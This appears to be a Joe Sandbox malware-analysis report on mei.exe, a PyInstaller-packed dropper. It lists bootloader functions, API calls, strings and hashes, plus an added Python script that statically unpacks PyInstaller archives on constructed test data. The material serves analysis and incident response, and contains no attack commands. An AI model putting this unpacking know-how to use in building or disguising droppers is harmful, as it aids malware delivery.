                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _fread_nolock$Message
                                                                                                                                                                      • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                      • API String ID: 677216364-1384898525
                                                                                                                                                                      • Opcode ID: d146c9a082a1dfd7af869683ec2c14ded0498efbf720b4fe8021dfa40491d494
                                                                                                                                                                      • Instruction ID: 7d284d2c4a2267529b7358f1897c38ec0d7f9f138eda02d07efffb9719a860c2
                                                                                                                                                                      • Opcode Fuzzy Hash: d146c9a082a1dfd7af869683ec2c14ded0498efbf720b4fe8021dfa40491d494
                                                                                                                                                                      • Instruction Fuzzy Hash: 705168B2F0964286FB24DF28E5801B977A0EF48B84F558135EA0CC7799DE3CE984DB44
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                      • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                      • API String ID: 2895956056-3524285272
                                                                                                                                                                      • Opcode ID: fafdda5ddf50bf931e4371b54ee8bd5a967635855b06c6fad95867fb7cb72d2f
                                                                                                                                                                      • Instruction ID: 9cd9f6a53e1f014b8bb5ad9ba312c7d75d0d2c2567bcf4afe5624a8bdcf771ae
                                                                                                                                                                      • Opcode Fuzzy Hash: fafdda5ddf50bf931e4371b54ee8bd5a967635855b06c6fad95867fb7cb72d2f
                                                                                                                                                                      • Instruction Fuzzy Hash: A9415432E0878282FB20DB24E4452AAB3A4FF94364F401739E6AD877D9DF7CD5449B40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 381 7ff6313d1000-7ff6313d3986 call 7ff6313dff10 call 7ff6313dff08 call 7ff6313d8660 call 7ff6313dff08 call 7ff6313dbc10 call 7ff6313e5100 call 7ff6313e5da4 call 7ff6313d1e50 399 7ff6313d3a82 381->399 400 7ff6313d398c-7ff6313d399c call 7ff6313d3e70 381->400 402 7ff6313d3a87-7ff6313d3aa7 call 7ff6313dbc70 399->402 400->399 405 7ff6313d39a2-7ff6313d39b5 call 7ff6313d3d40 400->405 405->399 409 7ff6313d39bb-7ff6313d39e2 call 7ff6313d7b10 405->409 412 7ff6313d3a24-7ff6313d3a4c call 7ff6313d7ff0 call 7ff6313d1c50 409->412 413 7ff6313d39e4-7ff6313d39f3 call 7ff6313d7b10 409->413 423 7ff6313d3a52-7ff6313d3a68 call 7ff6313d1c50 412->423 424 7ff6313d3b21-7ff6313d3b32 412->424 413->412 419 7ff6313d39f5-7ff6313d39fb 413->419 421 7ff6313d39fd-7ff6313d3a05 419->421 422 7ff6313d3a07-7ff6313d3a21 call 7ff6313e4f2c call 7ff6313d7ff0 419->422 421->422 422->412 440 7ff6313d3a6a-7ff6313d3a7d call 7ff6313d2ad0 423->440 441 7ff6313d3aa8-7ff6313d3aab 423->441 427 7ff6313d3b34-7ff6313d3b3b 424->427 428 7ff6313d3b4e-7ff6313d3b51 424->428 427->428 430 7ff6313d3b3d-7ff6313d3b40 call 7ff6313d14f0 427->430 432 7ff6313d3b53-7ff6313d3b59 428->432 433 7ff6313d3b67-7ff6313d3b7f call 7ff6313d8a90 428->433 443 7ff6313d3b45-7ff6313d3b48 430->443 437 7ff6313d3b9f-7ff6313d3bac call 7ff6313d6d90 432->437 438 7ff6313d3b5b-7ff6313d3b65 432->438 448 7ff6313d3b92-7ff6313d3b99 SetDllDirectoryW 433->448 449 7ff6313d3b81-7ff6313d3b8d call 7ff6313d2ad0 433->449 451 7ff6313d3bae-7ff6313d3bbb call 7ff6313d6a40 437->451 452 7ff6313d3bf7-7ff6313d3bfc call 7ff6313d6d10 437->452 438->433 438->437 440->399 441->424 442 7ff6313d3aad-7ff6313d3ac4 call 7ff6313d3f80 441->442 456 7ff6313d3acb-7ff6313d3af7 call 7ff6313d8260 442->456 457 7ff6313d3ac6-7ff6313d3ac9 442->457 443->399 443->428 448->437 449->399 451->452 466 7ff6313d3bbd-7ff6313d3bcc call 7ff6313d65a0 451->466 460 7ff6313d3c01-7ff6313d3c04 452->460 456->424 472 7ff6313d3af9-7ff6313d3b01 call 7ff6313e013c 456->472 462 7ff6313d3b06-7ff6313d3b1c call 7ff6313d2ad0 457->462 464 7ff6313d3c0a-7ff6313d3c17 460->464 465 7ff6313d3cb6-7ff6313d3cc5 call 7ff6313d3470 460->465 462->399 469 7ff6313d3c20-7ff6313d3c2a 464->469 465->399 483 7ff6313d3ccb-7ff6313d3d1f call 7ff6313d7f80 call 7ff6313d7b10 call 7ff6313d35d0 call 7ff6313d8030 call 7ff6313d67f0 call 7ff6313d6d10 465->483 481 7ff6313d3bce-7ff6313d3bda call 7ff6313d6520 466->481 482 7ff6313d3bed-7ff6313d3bf2 call 7ff6313d67f0 466->482 474 7ff6313d3c33-7ff6313d3c35 469->474 475 7ff6313d3c2c-7ff6313d3c31 469->475 472->462 479 7ff6313d3c81-7ff6313d3cb1 call 7ff6313d35d0 call 7ff6313d3410 call 7ff6313d35c0 call 7ff6313d67f0 call 7ff6313d6d10 474->479 480 7ff6313d3c37-7ff6313d3c5a call 7ff6313d1e90 474->480 475->469 475->474 479->402 480->399 494 7ff6313d3c60-7ff6313d3c6a 480->494 481->482 495 7ff6313d3bdc-7ff6313d3beb call 7ff6313d6be0 481->495 482->452 517 7ff6313d3d21-7ff6313d3d28 call 7ff6313d7cf0 483->517 518 7ff6313d3d2d-7ff6313d3d30 call 7ff6313d1e20 483->518 498 7ff6313d3c70-7ff6313d3c7f 494->498 495->460 498->479 498->498 517->518 521 7ff6313d3d35-7ff6313d3d37 518->521 521->402
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF6313D3E70: GetModuleFileNameW.KERNEL32(?,00007FF6313D399A), ref: 00007FF6313D3EA1
                                                                                                                                                                      • SetDllDirectoryW.KERNEL32 ref: 00007FF6313D3B99
                                                                                                                                                                        • Part of subcall function 00007FF6313D7B10: GetEnvironmentVariableW.KERNEL32(00007FF6313D39CF), ref: 00007FF6313D7B4A
                                                                                                                                                                        • Part of subcall function 00007FF6313D7B10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6313D7B67
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                      • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                      • API String ID: 2344891160-3602715111
                                                                                                                                                                      • Opcode ID: 7b51eefae9aff9e022c9cc253df53feff55f59b32aa123631ecb9f23d38996e3
                                                                                                                                                                      • Instruction ID: b73240ea5aef7a879209e88b326be2890a7ed347bb5a4be988735a6dd74fab9c
                                                                                                                                                                      • Opcode Fuzzy Hash: 7b51eefae9aff9e022c9cc253df53feff55f59b32aa123631ecb9f23d38996e3
                                                                                                                                                                      • Instruction Fuzzy Hash: EAB18EA1F1D68341FF24AB2198512FD6291FF44784F444135EA5DC779AEE3CEA05E702
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 522 7ff6313d1050-7ff6313d10ab call 7ff6313db490 525 7ff6313d10d3-7ff6313d10eb call 7ff6313e4f40 522->525 526 7ff6313d10ad-7ff6313d10d2 call 7ff6313d2ad0 522->526 531 7ff6313d10ed-7ff6313d1104 call 7ff6313d2830 525->531 532 7ff6313d1109-7ff6313d1119 call 7ff6313e4f40 525->532 537 7ff6313d126c-7ff6313d12a0 call 7ff6313db170 call 7ff6313e4f2c * 2 531->537 538 7ff6313d111b-7ff6313d1132 call 7ff6313d2830 532->538 539 7ff6313d1137-7ff6313d1147 532->539 538->537 540 7ff6313d1150-7ff6313d1175 call 7ff6313e048c 539->540 548 7ff6313d125e 540->548 549 7ff6313d117b-7ff6313d1185 call 7ff6313e0200 540->549 551 7ff6313d1264 548->551 549->548 556 7ff6313d118b-7ff6313d1197 549->556 551->537 557 7ff6313d11a0-7ff6313d11c8 call 7ff6313d9940 556->557 560 7ff6313d1241-7ff6313d125c call 7ff6313d2ad0 557->560 561 7ff6313d11ca-7ff6313d11cd 557->561 560->551 562 7ff6313d11cf-7ff6313d11d9 561->562 563 7ff6313d123c 561->563 565 7ff6313d1203-7ff6313d1206 562->565 566 7ff6313d11db-7ff6313d11e8 call 7ff6313e0bcc 562->566 563->560 568 7ff6313d1208-7ff6313d1216 call 7ff6313dc9f0 565->568 569 7ff6313d1219-7ff6313d121e 565->569 573 7ff6313d11ed-7ff6313d11f0 566->573 568->569 569->557 572 7ff6313d1220-7ff6313d1223 569->572 575 7ff6313d1225-7ff6313d1228 572->575 576 7ff6313d1237-7ff6313d123a 572->576 577 7ff6313d11f2-7ff6313d11fc call 7ff6313e0200 573->577 578 7ff6313d11fe-7ff6313d1201 573->578 575->560 580 7ff6313d122a-7ff6313d1232 575->580 576->551 577->569 577->578 578->560 580->540
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                      • API String ID: 2030045667-1655038675
                                                                                                                                                                      • Opcode ID: 499c5a6bbd1c96496fa219fb3f1336f4817f728ffc641d182fda7f11e14b9e67
                                                                                                                                                                      • Instruction ID: 90eddba96396f399075da283076ab1bc668c8daa0b80502860e38f7a18a95ee0
                                                                                                                                                                      • Opcode Fuzzy Hash: 499c5a6bbd1c96496fa219fb3f1336f4817f728ffc641d182fda7f11e14b9e67
                                                                                                                                                                      • Instruction Fuzzy Hash: AD518EB2E0D68286FB60AB61E4403BA6291FF85794F484135EE4DC7799EF3CE945E700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%
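The string sets of the two preceding functions (`_MEIPASS2`, `_PYI_ONEDIR_MODE`, "Cannot open PyInstaller archive from executable", and the zlib "1.2.13" / inflateInit() extraction errors) identify mei.exe as a PyInstaller onefile bootloader that inflates an embedded CArchive at run time. The following Python script is an added example for this report, not code from Joe Sandbox or from the sample: it finds the CArchive cookie in a binary, walks the table of contents and inflates one entry, so a responder can pull the packed Python payload out of a dropper like this statically instead of letting the bootloader run. It assumes the cookie and TOC layouts PyInstaller 2.1 and later write (`!8sIIii64s` and `!iIIIBc`, big-endian, cookie at the end of the package); the archive it parses is constructed inline and is not extracted from mei.exe.

```python
import struct
import zlib

# PyInstaller CArchive layout (PyInstaller >= 2.1). Assumed from the public
# archive writer format, not taken from the sandbox report.
MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIii64s"   # magic, package length, TOC offset, TOC length, python version, pylib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)   # 88 bytes
ENTRY_FMT = "!iIIIBc"        # entry size, data offset, compressed length, raw length, compress flag, type code
ENTRY_HDR = struct.calcsize(ENTRY_FMT)      # 18 bytes, followed by the NUL-padded entry name


def parse_pyinstaller_archive(blob):
    """Return cookie fields and TOC entries, or None if no PyInstaller cookie is present."""
    cookie_at = blob.rfind(MAGIC)
    if cookie_at < 0 or cookie_at + COOKIE_SIZE > len(blob):
        return None
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(
        COOKIE_FMT, blob[cookie_at:cookie_at + COOKIE_SIZE])
    # The package length counts everything up to and including the cookie, so the
    # archive start is measured back from the end of the cookie.
    archive_start = cookie_at + COOKIE_SIZE - pkg_len
    if archive_start < 0 or archive_start + toc_off + toc_len > cookie_at + COOKIE_SIZE:
        raise ValueError("cookie lengths do not fit inside the file")
    toc = blob[archive_start + toc_off:archive_start + toc_off + toc_len]
    entries, pos = [], 0
    while pos + ENTRY_HDR <= len(toc):
        entry_size, data_off, clen, ulen, flag, typ = struct.unpack(ENTRY_FMT, toc[pos:pos + ENTRY_HDR])
        if entry_size < ENTRY_HDR or pos + entry_size > len(toc):
            raise ValueError("corrupt TOC entry at %d" % pos)
        name = toc[pos + ENTRY_HDR:pos + entry_size].rstrip(b"\0").decode("utf-8", "replace")
        entries.append({"name": name, "type": typ.decode(), "offset": data_off,
                        "compressed_size": clen, "uncompressed_size": ulen, "compressed": flag == 1})
        pos += entry_size
    return {"archive_start": archive_start, "python_version": pyver,
            "pylib": pylib.rstrip(b"\0").decode("ascii", "replace"), "entries": entries}


def extract_entry(blob, info, entry):
    """Inflate one TOC entry; this is the step the bootloader's inflateInit()/inflate() strings belong to."""
    start = info["archive_start"] + entry["offset"]
    raw = blob[start:start + entry["compressed_size"]]
    if len(raw) != entry["compressed_size"]:
        raise ValueError("entry %s runs past end of file" % entry["name"])
    out = zlib.decompress(raw) if entry["compressed"] else raw
    if len(out) != entry["uncompressed_size"]:
        raise ValueError("entry %s: size mismatch after inflate" % entry["name"])
    return out


def build_sample_archive(files, pyver=311, pylib=b"python311.dll"):
    """Constructed test data: a fake PE stub followed by a CArchive, as a onefile build lays it out."""
    stub = b"MZ" + b"\0" * 62 + b"CONSTRUCTED-PE-STUB\0"
    data, toc = b"", b""
    for name, typ, payload in files:
        comp = zlib.compress(payload)
        name_b = name.encode()
        entry_size = ENTRY_HDR + len(name_b) + 1
        entry_size += (-entry_size) % 16          # writer pads entries to 16 bytes
        toc += struct.pack(ENTRY_FMT, entry_size, len(data), len(comp), len(payload), 1, typ)
        toc += name_b.ljust(entry_size - ENTRY_HDR, b"\0")
        data += comp
    pkg_len = len(data) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(data), len(toc), pyver, pylib.ljust(64, b"\0"))
    return stub + data + toc + cookie


if __name__ == "__main__":
    sample = build_sample_archive([
        ("pyiboot01_bootstrap", b"m", b"# constructed bootstrap module\n"),
        ("grabber", b"s", b"import os, sqlite3\n" * 40),
    ])
    info = parse_pyinstaller_archive(sample)
    print("python %d, %s" % (info["python_version"], info["pylib"]))
    for e in info["entries"]:
        print("%-24s type=%s %6d -> %6d bytes" % (e["name"], e["type"], e["compressed_size"], e["uncompressed_size"]))
    print(extract_entry(sample, info, info["entries"][1])[:18])
```

On a real sample, read the whole file and hand it to `parse_pyinstaller_archive`; entries of type `s` are the packed scripts (the usual place for a grabber's main module) and type `z` is the PYZ holding the bundled library modules. The cookie is searched for from the end of the file because a PE can carry data (a signature, appended junk) after the package.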

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF6313EF41A,?,?,-00000018,00007FF6313EB1C7,?,?,?,00007FF6313EB0BE,?,?,?,00007FF6313E6302), ref: 00007FF6313EF1FC
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF6313EF41A,?,?,-00000018,00007FF6313EB1C7,?,?,?,00007FF6313EB0BE,?,?,?,00007FF6313E6302), ref: 00007FF6313EF208
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                      • Opcode ID: 51859395d0e275caf5d2b073e71f005ee4f098fce477efb6989a4a0f7b6cb53b
                                                                                                                                                                      • Instruction ID: 101524dd5e4d62da1ba3ac28bb2d21a6c43ac3f9a3d8b7f7a004e016d9d3facd
                                                                                                                                                                      • Opcode Fuzzy Hash: 51859395d0e275caf5d2b073e71f005ee4f098fce477efb6989a4a0f7b6cb53b
                                                                                                                                                                      • Instruction Fuzzy Hash: 6641FF62F19B0251FB16CB169C006B52399BF4ABE0F095535DD1DD7784EE7CEA04A310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 679 7ff6313ebecc-7ff6313ebef2 680 7ff6313ebef4-7ff6313ebf08 call 7ff6313e52b4 call 7ff6313e52d4 679->680 681 7ff6313ebf0d-7ff6313ebf11 679->681 697 7ff6313ec2fe 680->697 683 7ff6313ec2e7-7ff6313ec2f3 call 7ff6313e52b4 call 7ff6313e52d4 681->683 684 7ff6313ebf17-7ff6313ebf1e 681->684 703 7ff6313ec2f9 call 7ff6313ead54 683->703 684->683 686 7ff6313ebf24-7ff6313ebf52 684->686 686->683 689 7ff6313ebf58-7ff6313ebf5f 686->689 692 7ff6313ebf61-7ff6313ebf73 call 7ff6313e52b4 call 7ff6313e52d4 689->692 693 7ff6313ebf78-7ff6313ebf7b 689->693 692->703 695 7ff6313ec2e3-7ff6313ec2e5 693->695 696 7ff6313ebf81-7ff6313ebf87 693->696 700 7ff6313ec301-7ff6313ec318 695->700 696->695 701 7ff6313ebf8d-7ff6313ebf90 696->701 697->700 701->692 704 7ff6313ebf92-7ff6313ebfb7 701->704 703->697 707 7ff6313ebfea-7ff6313ebff1 704->707 708 7ff6313ebfb9-7ff6313ebfbb 704->708 712 7ff6313ebff3-7ff6313ec01b call 7ff6313eda6c call 7ff6313eadbc * 2 707->712 713 7ff6313ebfc6-7ff6313ebfdd call 7ff6313e52b4 call 7ff6313e52d4 call 7ff6313ead54 707->713 710 7ff6313ebfe2-7ff6313ebfe8 708->710 711 7ff6313ebfbd-7ff6313ebfc4 708->711 716 7ff6313ec068-7ff6313ec07f 710->716 711->710 711->713 740 7ff6313ec01d-7ff6313ec033 call 7ff6313e52d4 call 7ff6313e52b4 712->740 741 7ff6313ec038-7ff6313ec063 call 7ff6313ec6f4 712->741 744 7ff6313ec170 713->744 719 7ff6313ec081-7ff6313ec089 716->719 720 7ff6313ec0fa-7ff6313ec104 call 7ff6313f3e3c 716->720 719->720 721 7ff6313ec08b-7ff6313ec08d 719->721 732 7ff6313ec18e 720->732 733 7ff6313ec10a-7ff6313ec11f 720->733 721->720 725 7ff6313ec08f-7ff6313ec0a5 721->725 725->720 729 7ff6313ec0a7-7ff6313ec0b3 725->729 729->720 734 7ff6313ec0b5-7ff6313ec0b7 729->734 736 7ff6313ec193-7ff6313ec1b3 ReadFile 732->736 733->732 738 7ff6313ec121-7ff6313ec133 GetConsoleMode 733->738 734->720 739 7ff6313ec0b9-7ff6313ec0d1 734->739 742 7ff6313ec2ad-7ff6313ec2b6 GetLastError 736->742 743 7ff6313ec1b9-7ff6313ec1c1 736->743 738->732 745 7ff6313ec135-7ff6313ec13d 738->745 739->720 749 7ff6313ec0d3-7ff6313ec0df 739->749 740->744 741->716 746 7ff6313ec2d3-7ff6313ec2d6 742->746 747 7ff6313ec2b8-7ff6313ec2ce call 7ff6313e52d4 call 7ff6313e52b4 742->747 743->742 751 7ff6313ec1c7 743->751 748 7ff6313ec173-7ff6313ec17d call 7ff6313eadbc 744->748 745->736 753 7ff6313ec13f-7ff6313ec161 ReadConsoleW 745->753 757 7ff6313ec2dc-7ff6313ec2de 746->757 758 7ff6313ec169-7ff6313ec16b call 7ff6313e5248 746->758 747->744 748->700 749->720 756 7ff6313ec0e1-7ff6313ec0e3 749->756 760 7ff6313ec1ce-7ff6313ec1e3 751->760 762 7ff6313ec182-7ff6313ec18c 753->762 763 7ff6313ec163 GetLastError 753->763 756->720 767 7ff6313ec0e5-7ff6313ec0f5 756->767 757->748 758->744 760->748 769 7ff6313ec1e5-7ff6313ec1f0 760->769 762->760 763->758 767->720 772 7ff6313ec1f2-7ff6313ec20b call 7ff6313ebae4 769->772 773 7ff6313ec217-7ff6313ec21f 769->773 781 7ff6313ec210-7ff6313ec212 772->781 774 7ff6313ec221-7ff6313ec233 773->774 775 7ff6313ec29b-7ff6313ec2a8 call 7ff6313eb924 773->775 778 7ff6313ec235 774->778 779 7ff6313ec28e-7ff6313ec296 774->779 775->781 782 7ff6313ec23a-7ff6313ec241 778->782 779->748 781->748 784 7ff6313ec243-7ff6313ec247 782->784 785 7ff6313ec27d-7ff6313ec288 782->785 786 7ff6313ec263 784->786 787 7ff6313ec249-7ff6313ec250 784->787 785->779 789 7ff6313ec269-7ff6313ec279 786->789 787->786 788 7ff6313ec252-7ff6313ec256 787->788 788->786 790 7ff6313ec258-7ff6313ec261 788->790 789->782 791 7ff6313ec27b 789->791 790->789 791->779
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 155280e7eec12617aa58257054cdd625bf5da88935439d5fe27c70127b1b473f
                                                                                                                                                                      • Instruction ID: 68f82bc52f7538f72a0ed32725b27e46c022e7ba28a11af8112fac235540b487
                                                                                                                                                                      • Opcode Fuzzy Hash: 155280e7eec12617aa58257054cdd625bf5da88935439d5fe27c70127b1b473f
                                                                                                                                                                      • Instruction Fuzzy Hash: F7C10223E0C78691FB618B5594402BE7BA1FF81B80F552131EA4E87391CE7DEE59E720
                                                                                                                                                                      Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6313ED3BB), ref: 00007FF6313ED4EC
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6313ED3BB), ref: 00007FF6313ED577
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: 813048f28f07144688fb23e83c74998d7ce6929819ff7ff72a59b30d9d7db0ba
• Instruction ID: fdd7c145344317f5d1f07ae1df0a03383aa98e7dbd1d70bfb6342dcaac63c260
• Opcode Fuzzy Hash: 813048f28f07144688fb23e83c74998d7ce6929819ff7ff72a59b30d9d7db0ba
• Instruction Fuzzy Hash: C1910573F1875289F7509F2598402BD2BA0BB44B98F542139DE0EA7794CF3CE942EB20
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Similarity
• API ID: _get_daylight$_isindst
• String ID:
• API String ID: 4170891091-0
• Opcode ID: 81266db9261f470eac97443019771647f4442bde83bb1ca56588bed4861e4902
• Instruction ID: c3c123dd5bbf6b5e5bfb73f4733de07095ae89e59ec57186e3e85e533679be36
• Opcode Fuzzy Hash: 81266db9261f470eac97443019771647f4442bde83bb1ca56588bed4861e4902
• Instruction Fuzzy Hash: 24514773F043128AFB28DF64C9556FD7BA9AB04398F101235DD2E82BE9DF38A9019700
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 1452418845-0
• Opcode ID: 989d74823dce4e07038ae679384eaff95f144168f5a330d89d565e0032f8335b
• Instruction ID: dc12c57b1a0514e16e59867661a653a792f07cee51a883b3c30f22081f78b0c3
• Opcode Fuzzy Hash: 989d74823dce4e07038ae679384eaff95f144168f5a330d89d565e0032f8335b
• Instruction Fuzzy Hash: C3313721E6C29381FF14AB7599523B92391AF41784F885439EA4ECB3D7DE3CB908E350
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: bc259eb1f50762d0e4e8c4154cc1f660a24a9b6da41aa685068df7d2900645f2
• Instruction ID: 46eb3b9775e3d9e365afabdfb66dcca8aec814be435129b3275b0d463cbbfcc5
• Opcode Fuzzy Hash: bc259eb1f50762d0e4e8c4154cc1f660a24a9b6da41aa685068df7d2900645f2
• Instruction Fuzzy Hash: 1541A167D1878283F7508B6095443A96361FF947A4F10A334EA9D83BD6DF7CAAE09710
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
